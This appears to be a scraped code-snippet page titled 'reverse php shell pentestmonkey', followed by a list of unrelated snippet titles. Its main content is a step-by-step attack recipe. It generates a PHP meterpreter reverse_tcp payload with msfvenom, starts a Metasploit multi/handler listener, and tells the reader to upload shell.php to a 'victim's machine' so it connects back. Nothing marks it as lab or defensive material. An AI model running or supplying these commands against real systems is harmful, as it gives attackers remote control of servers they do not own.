reverse php shell pentestmonkey
##This will create the payload file "shell.php" with your ip and port.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php
##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.
#Run 'msfconsole' to start the listener then run the following command.
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
#set your ipaddr
set LHOST <$LOCAL_IP>
#set your listening port
set LPORT <$LOCAL_PORT>
#"show options" to check ur steps then run the command "exploit"
exploit #this will start the listener
#Upload "shell.php" to your victim's machine.
#The victim's machine will need to run the file to connect back to your machine.
Also in C++:
- Write a function that takes an integer n and returns a random integer with exactly n digits. For instance, if n is 3, then 125 and 593 would be valid return values, but 093 would not because that is really 93, which is a two-digit number.
- git reset to origin/master
- git search history for file
- reverse shell rubber ducky script
- download putty for ubuntu
- install nltk.corpus in vscode
- vim jump to beginning of line
- How to uninstall grepper google addon
- scss in gatsby
- react native ubuntu 20.04
- change data type powershell
- install pytest
- ohmyzsh
- how to list banned IP ubuntu
- shell commands windows
- print screen in ubuntu to folder
- install RHEL in vmware
- pm2 install
- git clone epitech
- \Activate.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170
- gitignore is not working
- screen scroll up linux
- linux check if x11
- git reset hard to remote